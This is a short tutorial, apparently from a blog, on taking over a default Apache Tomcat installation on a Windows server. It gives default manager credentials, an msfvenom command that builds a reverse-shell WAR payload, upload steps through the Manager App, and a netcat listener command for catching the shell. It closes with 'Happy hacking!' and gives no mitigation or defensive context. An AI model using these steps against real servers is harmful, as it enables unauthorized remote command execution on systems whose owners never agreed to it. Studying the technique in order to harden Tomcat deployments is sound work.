How to exploit Apache Tomcat default install

A default Apache Tomcat installation allows you to upload a WAR file and spawn a reverse shell on the server.
This demo targets a Windows server.

When you open the “Manager App”, it will ask you for a user/password, which is tomcat/s3cret by default.
We should first generate the WAR file by running:

  • msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f war > rev.war

This should generate a rev.war file, which we will upload to the manager page.


After a successful upload, a JSP page will be created and the reverse shell is ready to go.
All we need to do is set up our TCP Netcat listener using:

  • nc -nlvp PORT

Then navigate to the new JSP page, and a shell will be spawned back to you.

Happy hacking!

 
